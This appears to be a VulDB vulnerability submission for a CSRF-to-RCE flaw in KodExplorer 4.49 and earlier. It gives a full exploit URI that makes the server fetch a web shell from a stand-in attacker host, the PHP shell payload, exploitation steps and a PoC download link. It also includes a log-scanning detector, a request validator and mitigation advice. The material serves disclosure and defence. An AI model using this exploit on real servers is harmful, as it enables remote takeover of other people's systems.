| Title | KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE) |
|---|
| Description | # Exploit Title: KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: <= 4.49
Title:
================
KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE)
Summary:
================
KodExplorer 4.49 and earlier contains a critical-rated vulnerability in the explorer/serverDownload action: it performs a state-changing operation over a plain GET request with no anti-CSRF token. An attacker who tricks an authenticated user into opening a crafted link makes the server fetch an attacker-hosted PHP file and write it to an attacker-chosen path under the web root, where it executes and gives the attacker remote code execution. The attack is Cross-site Request Forgery and requires victim interaction (opening the link while logged in).
Severity Level:
================
9.0 (Critical)
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Affected Product:
================
KodExplorer <= 4.49
Proof of Concept:
================
Note: I have attached an exploit demonstrating the vulnerability along with print screens.
URL: https://www.mediafire.com/file/709i2vxybergtg7/poc.zip/file
Zip password: m@knwMByu9pf4^UZWyB3WX@*6YznD2C9V*yqA4Yi@J
The vulnerable action accepts its parameters in a GET request, so the whole attack fits in a single URI that the victim only has to open:
http://target.tld/index.php?explorer/serverDownload&type=download&savePath=/var/www/html/data/User/admin/home/&url=http://attacker.tld/shell.php&uuid=&time=
savePath: absolute filesystem directory where the fetched PHP file is written. It is taken from the request as-is, so the attacker needs to know (or guess) where the application is installed, e.g. /var/www/html/. The path used in the PoC is the admin user's home folder under the KodExplorer data directory, which is also reachable over HTTP.
url: the attacker's web server, hosting the PHP file shell.php. The target server fetches this file once the victim opens the malicious URL.
After assembling the payload, follow these steps:
1. Log in to KodExplorer as the victim would; the forged request is authenticated only because the browser attaches the victim's session cookie.
2. On the attacker's web server, host shell.php with this payload:
<?php system($_GET["cmd"]); ?>
3. Open the malicious URI in the logged-in browser. The application reports that shell.php was downloaded successfully.
4. Request http://target.tld/data/User/admin/home/shell.php?cmd=id; the output of id confirms code execution as the web server's user.
Exploit example:
Attacker:
[1.png]
Victim opens URL:
[2.png]
Attacker manages to get a web shell on the system:
[3.png]
Reverse shell:
Attacker:
[4.png]
Victim:
[5.png]
Attacker:
[6.png]
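Added example (not from the advisory or from KodExplorer): a small Python scanner that flags the request pattern above in a web server's access log after the fact. It assumes the Apache/nginx combined log format, which records the Referer, and that the site answers as target.tld; the three log lines are constructed, the first mirroring the PoC request and the other two benign traffic. GET by itself is not used as a signal, since the vulnerable function legitimately uses GET; the scanner keys on a server-executable extension in the fetched URL and on a Referer that is missing or belongs to another origin.

```python
"""Flag the serverDownload CSRF pattern in web-server access logs.

Added example for this page; not part of the original advisory or of
KodExplorer. Assumes the combined log format (which records the Referer)
and that the site is served as target.tld. SAMPLE_LOG is constructed: the
first line mirrors the advisory's PoC request, the other two are benign.
"""
import re
from urllib.parse import parse_qs, urlsplit

# combined format: client ident user [time] "METHOD target PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

# extensions a PHP-enabled web root will execute if the fetched file lands under it
EXECUTABLE_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")

SAMPLE_LOG = """\
203.0.113.7 - - [21/Apr/2023:10:15:32 +0000] "GET /index.php?explorer/serverDownload&type=download&savePath=/var/www/html/data/User/admin/home/&url=http://attacker.tld/shell.php&uuid=&time= HTTP/1.1" 200 89 "http://attacker.tld/lure.html" "Mozilla/5.0"
198.51.100.4 - - [21/Apr/2023:10:02:10 +0000] "GET /index.php?explorer/serverDownload&type=download&savePath=/var/www/html/data/User/alice/home/&url=https://files.example.org/report.pdf&uuid=&time= HTTP/1.1" 200 89 "http://target.tld/index.php" "Mozilla/5.0"
198.51.100.4 - - [21/Apr/2023:10:02:11 +0000] "GET /static/app.js HTTP/1.1" 200 5120 "http://target.tld/index.php" "Mozilla/5.0"
"""


def parse_target(target):
    """Split a request target into KodExplorer's route (first query segment) and its parameters."""
    query = urlsplit(target).query
    route = query.split("&", 1)[0]          # e.g. "explorer/serverDownload"
    # parse_qs skips the bare route segment and the empty uuid=/time= fields
    params = {k: v[0] for k, v in parse_qs(query).items()}
    return route, params


def analyze_line(line, site_host):
    """Return a finding dict for a serverDownload request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    route, params = parse_target(m["target"])
    if route != "explorer/serverDownload":
        return None
    reasons = []
    fetched = urlsplit(params.get("url", ""))
    if fetched.path.lower().endswith(EXECUTABLE_EXTS):
        reasons.append("remote file has a server-executable extension")
    # combined logs write "-" for a missing Referer; urlsplit("-").hostname is None
    referer_host = urlsplit(m["referer"]).hostname
    if referer_host is None:
        reasons.append("no Referer on a state-changing request")
    elif referer_host != site_host:
        reasons.append(f"cross-origin Referer {referer_host}")
    return {
        "ip": m["ip"], "time": m["time"], "method": m["method"],
        "url": params.get("url", ""), "savePath": params.get("savePath", ""),
        "reasons": reasons,
    }


def scan(log_text, site_host):
    """Return only the serverDownload findings that carry at least one reason."""
    findings = (analyze_line(l, site_host) for l in log_text.splitlines() if l.strip())
    return [f for f in findings if f and f["reasons"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG, "target.tld"):
        print(f["time"], f["ip"], f["method"], f["url"], "->", f["savePath"])
        for r in f["reasons"]:
            print("   ", r)
```

Run against a real log, the savePath and url fields of each finding tell you where to look for the dropped file and which host served it; a successful drop is usually followed in the same log by GET requests to that path with a cmd parameter.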
Mitigation:
================
Since this is a CSRF flaw, the serverDownload action needs an anti-CSRF token bound to the user's session and verified server-side on every request; a cross-site page cannot read that token, so it cannot forge a valid request.
Change the request method from GET to POST as well. On its own this is not a fix, because a cross-origin form can still POST, but it keeps the action out of plain links and image tags and makes the token check the natural place to enforce it.
Independently of CSRF, the action should not accept an arbitrary absolute savePath or store files the web server will execute: confine the destination to the user's own storage directory and reject server-executable extensions such as .php, otherwise any future way of reaching the endpoint again yields code execution.
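Added example of the checks described above, written in Python as a framework-agnostic model rather than as a patch to KodExplorer's PHP; it is not the project's code. `request` is a dict standing in for the parsed HTTP request and `session` for the server-side session; the header name X-CSRF-Token, the session key csrf_token and the sample paths are assumptions. poc_request() reproduces the parameters of the PoC URI and is rejected on every check, while the legitimate request carries the session's token and a home-relative savePath and passes.

```python
"""Request validation a remote-download action needs so the CSRF chain
cannot end in code execution.

Added example for this page, not KodExplorer's code. Framework-agnostic:
`request` stands in for the parsed HTTP request, `session` for the server-side
session store. Header name X-CSRF-Token and session key csrf_token are assumptions.
"""
import hmac
import os
import secrets
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# never persist anything the web server might execute or that changes its config
FORBIDDEN_EXTS = {".php", ".php3", ".php5", ".php7", ".phtml", ".phar"}
FORBIDDEN_NAMES = {".htaccess", ".user.ini"}

USER_HOME = "/var/www/html/data/User/admin/home"         # path from the advisory's PoC


def issue_csrf_token(session):
    """Mint one unguessable token per session; the client sends it back with every POST."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def token_valid(session, presented):
    expected = session.get("csrf_token")
    if not expected or not presented:
        return False
    return hmac.compare_digest(expected.encode(), presented.encode())  # constant-time compare


def resolve_inside(user_home, save_path):
    """Absolute target directory if save_path stays inside user_home, else None."""
    if os.path.isabs(save_path):
        return None                                      # only home-relative paths are accepted
    home = os.path.realpath(user_home)
    target = os.path.realpath(os.path.join(home, save_path))
    return target if os.path.commonpath([home, target]) == home else None


def safe_filename(url_path):
    """False for an empty name, a config file, or any executable (inner) extension."""
    name = os.path.basename(url_path).lower()
    if not name or name in FORBIDDEN_NAMES:
        return False
    inner = name.split(".")[1:]                          # "shell.php.jpg" -> ["php", "jpg"]
    return not any("." + p in FORBIDDEN_EXTS for p in inner)


def validate_server_download(request, session, user_home):
    """Return rejection reasons; an empty list means the download may proceed."""
    reasons = []
    if request["method"] != "POST":
        reasons.append("state-changing action must be POST")
    if not token_valid(session, request.get("headers", {}).get("X-CSRF-Token")):
        reasons.append("missing or invalid CSRF token")
    fetched = urlsplit(request["params"].get("url", ""))
    if fetched.scheme not in ALLOWED_SCHEMES or not fetched.hostname:
        reasons.append("url must be http(s) with a host")
    elif not safe_filename(fetched.path):
        reasons.append("refusing to store a server-executable file")
    if resolve_inside(user_home, request["params"].get("savePath", "")) is None:
        reasons.append("savePath must stay inside the user's home")
    return reasons


def poc_request():
    """The advisory's GET request as the server sees it (constructed)."""
    return {"method": "GET", "headers": {},
            "params": {"type": "download",
                       "savePath": "/var/www/html/data/User/admin/home/",
                       "url": "http://attacker.tld/shell.php"}}


def legitimate_request(session):
    """A same-origin client carrying the session's token (constructed)."""
    return {"method": "POST",
            "headers": {"X-CSRF-Token": issue_csrf_token(session)},
            "params": {"type": "download", "savePath": "downloads",
                       "url": "https://files.example.org/report.pdf"}}


def demo():
    """Run both requests through the validator; returns (poc_reasons, legit_reasons)."""
    session = {}
    return (validate_server_download(poc_request(), session, USER_HOME),
            validate_server_download(legitimate_request(session), session, USER_HOME))


if __name__ == "__main__":
    poc, legit = demo()
    print("PoC request rejected for:", poc)
    print("legitimate request rejected for:", legit)
```

The four checks are deliberately independent: even if the token check were later bypassed, the path confinement and the extension filter still stop the fetched file from becoming a web shell.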
Vulnerability Disclosure Schedule:
================
* October 17, 2022: An issue note was created in the official repository (https://github.com/kalcaddle/KodExplorer/issues/512)
* November 3, 2022: I received a response with the email address to report the vulnerability
* November 3, 2022: I sent an email detailing the vulnerability
* April 21, 2023: I have not received any response and the current product version is 4.51 |
|---|
| Source | https://github.com/kalcaddle/KodExplorer/issues/512 |
|---|
| User | mrempy (UID 24379) |
|---|
| Submitted | 2023-04-21 07:45 AM (3 years ago) |
|---|
| Moderation | 2023-04-21 04:01 PM (8 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 227000 [kalcaddle KodExplorer up to 4.49 cross-site request forgery] |
|---|
| Points | 20 |
|---|